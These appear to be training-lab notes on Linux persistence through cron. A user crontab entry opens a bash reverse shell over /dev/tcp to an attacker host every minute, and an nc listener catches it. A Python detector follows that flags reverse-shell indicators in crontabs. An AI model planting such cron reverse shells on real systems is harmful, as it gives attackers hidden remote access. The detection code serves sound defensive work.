Cron Jobs

ip -br -c a
	192.175.36.2/24
ssh student@192.175.36.3

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 14:04 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student   18 Apr 29 14:04 .bash_history
    drwx------ 2 student student 4096 Apr 29 14:04 .cache
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.
cat /etc/cron*

Persistence

  • Create a new Cron job as the student user

    • The command inside the cron job will be executed with the student user's permissions

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.175.36.2/1234 0>&1'" > cron

crontab -i cron
crontab -l
  • Log back into the target system and trigger the password and connection reset

ssh student@192.175.36.3
rm wait
# The old student password no longer works
  • Set up an nc listener and wait for the bash reverse shell from the cron job, which runs every minute

nc -nvlp 1234
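
From the defender's side, the job planted above is visible in the student user's crontab. The following is an added example, not part of the original notes: it scans crontab text for the indicators that entry carries. The indicator patterns and the function names are assumptions chosen for illustration, and the sample crontab is constructed.

```python
import re

# Assumed heuristics: patterns that rarely appear in legitimate scheduled jobs.
INDICATORS = {
    "dev-tcp-redirect": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    "interactive-shell": re.compile(r"\b(ba|da|z)?sh\s+-i\b"),
    "netcat-exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-(e|c)\b"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_entry(line):
    """Return (schedule, command) for a user crontab job line, else None."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)  # five time fields, then the command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def audit_crontab(text, user):
    """Return one finding dict per job whose command matches an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(command))
        if hits:
            findings.append({"user": user, "line": lineno, "schedule": schedule,
                             "every_minute": schedule == "* * * * *",
                             "indicators": hits})
    return findings

# Constructed sample: one benign job plus the entry shown on this page.
SAMPLE = """\
MAILTO=""
# nightly backup
30 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.175.36.2/1234 0>&1'
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE, "student"):
        print(finding)
```

In practice the text would come from `crontab -l -u <user>` for each account, run as root.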